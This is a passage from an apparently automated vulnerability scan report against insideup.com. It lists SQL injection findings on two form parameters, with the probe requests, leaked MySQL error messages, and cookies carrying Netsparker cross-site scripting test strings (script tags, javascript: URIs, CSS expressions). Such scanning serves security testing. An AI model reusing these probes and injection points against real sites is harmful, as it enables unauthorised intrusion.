OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fv96lgmtv0sogi5luab7hp4v24; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.287. http://www.insideup.com/ppc/leadflow/fist00/project.php [attributeId_453 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The attributeId_453 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_453 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference'&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mb6u8cegm274p3iq10equms4a0; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still in the planning stag' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference''&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=i4i97n9lgib4lmpbd296te4mv3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.288. http://www.insideup.com/ppc/leadflow/fist00/project.php [attributeId_454 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The attributeId_454 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_454 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure'&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:59:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=dec87o80jo4kd3fj7gfcofbcm2; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'the planning stages&attributeId_457=2968__Less than $100,000&button3=Submit&comp' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure''&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; 